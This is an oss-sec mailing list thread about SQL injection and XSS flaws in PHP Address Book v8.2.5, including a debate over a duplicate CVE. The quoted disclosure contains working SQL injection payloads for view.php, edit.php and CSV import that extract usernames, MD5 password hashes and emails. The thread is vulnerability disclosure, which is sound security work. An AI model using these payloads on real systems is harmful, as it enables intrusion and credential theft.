oss-sec mailing list archives
Re: Multiple vulnerabilities in PHP Address Book v8.2.5
From: Doraemon Sk8ers <doraemon.sk8ers () gmail com>
Date: Fri, 10 May 2013 17:14:33 +0800
Hi Henri, CVE-2013-1748 #1 does seems to be similar with CVE-2008-2565, the only difference is the increase in the number of columns To our knowledge, CVE-2013-1748 #2 and #3 has not been published before Regards Team Doraemon.Sk8ers http://doraemondroids.wikispaces.com/ On Wed, Apr 17, 2013 at 10:27 PM, Henri Salo <henri () nerv fi> wrote:
Hello, I believe CVE-2013-1748 #1 is duplicate of CVE-2008-2565 as per OSVDB[1]. As far as I know most of security vulnerabilities reported to this project haven't been fixed. Haven't verified this detail. What php-addressbook project would need is patches to fix all issues you can find. Finding vulnerabilities is easy - fixing in upstream is not. I can help you if you are willing to write patches. Takes hour or two :) 1: http://osvdb.org/45965 --- Henri Salo On Wed, Apr 17, 2013 at 11:14:27AM +0800, Doraemon Sk8ers wrote:There is a SQL injection vulnerability and reflected XSS in Simple PHP Address Book v8.2.5. The 2 vulnerabilities had been assigned the CVE identifier CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS) respectively. # Software Link: http://sourceforge.net/projects/php-addressbook/ # Version: v8.2.5 # Tested on: v8.2.5 # CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS) Details: ----------- * * *CVE-2013-1748 (SQLi)* We have discovered 3 pages which are prone to SQL Injection 1. /view.php?id=1 The "id" parameter is vulnerable to SQL injection Injection Vector: /view.php?id=-1' union select '1','2','3','4',(select username from users limit 1),(select md5_pass from users limit 1),(select email from users limit1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41This injection vector will dump the username, md5 password and email of the first user in the user table onto the page itself 2. /edit.php Most of the fields on this page are vulnerable to SQL injection Injection Vector (inclusive of quotes): '+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1),1)))+'This will dump out the ASCII value of the 1st character of the md5 password of the first user 3. /import.php The same injection vulnerability as Point 2 above is also present in the import function Using the same injection vector, saved in a csv file '+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1),1)))+'Similarly, this injection vector will dump out the ASCII value of the 1st character of the md5 password of the first user The original input csv sample looks like this "Last name";"First name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail home";"Work";"Fax";"E-mail office";"Second address";"Second phone" "thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city, Country";"+1 123 456 789";"+2 345 678 910";"first.last () mail1 com";"+3 456 789 101";"+4 567 897 011";"first.last () mail2 net";"second street, 1234 secondcity, secondcountry";"+5 678 910 111" The injected csv with the injected vectors looks like this "Last name";"First name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail home";"Work";"Fax";"E-mail office";"Second address";"Second phone" "";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456 789";"+2 345 678 910";"first.last () mail1 com";"+3 456 789 101";"+4 567 897 011";"first.last () mail2 net";"second street, 1234 secondcity, secondcountry";"+5 678 910 111"<snip> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAlFusWEACgkQXf6hBi6kbk+zewCgv1NZPnNJ+oullyyNGCZIiZDE yVgAn0B3sIciT45IzHOQgAhZpEl+ul0p =c0zL -----END PGP SIGNATURE-----
Current thread:
- Multiple vulnerabilities in PHP Address Book v8.2.5 Doraemon Sk8ers (Apr 16)
- Re: Multiple vulnerabilities in PHP Address Book v8.2.5 Henri Salo (Apr 17)
- Re: Multiple vulnerabilities in PHP Address Book v8.2.5 Doraemon Sk8ers (May 10)
- Re: Multiple vulnerabilities in PHP Address Book v8.2.5 Kurt Seifried (May 10)
- Re: Multiple vulnerabilities in PHP Address Book v8.2.5 Henri Salo (May 18)
- Re: Multiple vulnerabilities in PHP Address Book v8.2.5 Doraemon Sk8ers (May 10)
- Re: Multiple vulnerabilities in PHP Address Book v8.2.5 Henri Salo (Apr 17)